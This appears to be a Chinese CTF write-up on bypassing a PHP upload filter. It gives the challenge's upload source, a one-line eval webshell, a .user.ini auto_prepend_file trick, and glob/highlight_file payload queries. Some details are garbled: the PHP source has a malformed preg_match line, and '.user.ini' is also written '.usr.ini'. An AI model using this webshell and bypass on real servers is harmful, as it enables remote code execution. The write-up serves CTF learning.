上传一句话木马 1.php文件,显示
再改后缀为.jpg,显示错误文件大小
用dirsearch扫一下
备份文件.bak
下载文件源码
<?php
header("content-type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];
$temp_name = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
$arr = pathinfo($filename);
$ext_suffix = $arr['extension'];
if ($size > 24){
die("error file zise");
}
if (strlen($filename)>9){
die("error file name");
}
if(strlen($ext_suffix)>3){
die("error suffix");
}
if(preg_match("/php/i",$ext_suffix)){
die("error suffix");
}
if(preg_match("/php/i"),$filename){
die("error file name");
}
if (move_uploaded_file($temp_name, './'.$filename)){
echo "文件上传成功!";
}else{
echo "文件上传失败!";
}
?>
要求文件大小少于24字节,文件名少于九个字节,后缀小于三个字节,并且后缀不能是.php ,文件名不能为php。
构造一个一句话的文本文件a.txt,大小刚好24
<?php eval($_POST['a']);
然后构造一个.user.ini文件
auto_prepend_file=a.txt // 意思是所有a.txt文件都以php文件方式打开
在.usr.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。在 .usr.ini 中输入 auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含 a.txt 的内容 。
上传成功之后,但蚁剑这里连接不上,可能是.txt文件蚁剑无法通过php进行解析吧。第二种方法:
?a=print_r(glob("*")); // 显示所有文件
?a=highlight_file("文件名"); //显示文件到前端
记得后面要打 ;
